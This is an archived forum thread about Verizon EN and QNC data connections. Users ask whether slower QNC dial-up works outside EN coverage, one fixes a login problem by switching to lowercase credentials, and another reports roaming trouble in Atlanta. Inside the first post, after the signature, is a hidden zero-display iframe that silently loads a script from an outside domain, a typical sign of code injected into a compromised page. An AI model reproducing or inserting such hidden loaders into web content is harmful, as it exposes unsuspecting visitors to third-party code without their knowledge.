+ Reply to Thread

EN out area question

For those of you who have EN, are you able to make a data connection at a slower rate when you are out of EN coverage?

I am considering EN but since I travel a lot I need to make connections when EN is not available.

Thanks

Dan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: EN out area question

Originally posted by gdanu
    For those of you who have EN, are you able to make a data connection at a slower rate when you are out of EN coverage?

I am considering EN but since I travel a lot I need to make connections when EN is not available.

Thanks

Dan
    Yes, you can make a QNC connection in any Verizon digital coverage area or when roaming on Alltel at least.

Alan

Thanks Alan,

Wanted to make sure before I ordered it.

I don't have EN but use QNC here in San Diego. I was in Atlanta over the weekend and wasn't able to connect to QNC there at all. Couldn't make a connection to #777. Is that service not available in Atlanta?

Update: Ok, I answered my own question. The way I had my phone setup to use QNC had the user name and password in upper case "QNC" instead of "qnc". I've been using it that way for a long time without problem. Turns out I couldn't access QNC today from San Diego either.

I changed the login and password to lower case and now it works. Of course I can't go back to Atlanta and see if it works there too but it probably would. The only thing I've changed on my phone since I last used the QNC connection was that I got my software flashed to the newer version before I left for Atlanta. I didn't check the QNC connection before leaving.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Question qnc, roaming in Atlanta

I'm in Atlanta now and can't access Verizon's qnc (lower case). Also, my phone insists it's in a digital roaming area, and the battery drains in about twelve hours in standby. I have the latest prl and updated it twice to be sure.

Also, this my second phone. I returned my original to Kyocera in April after my last trip to Atlanta. When I arrived in Atlanta in April, my original phone was suffering from the then common instability problems. When I left after four days it was dead; even hard resets had no effect.

Anybody else have problems in Atlanta?

GWW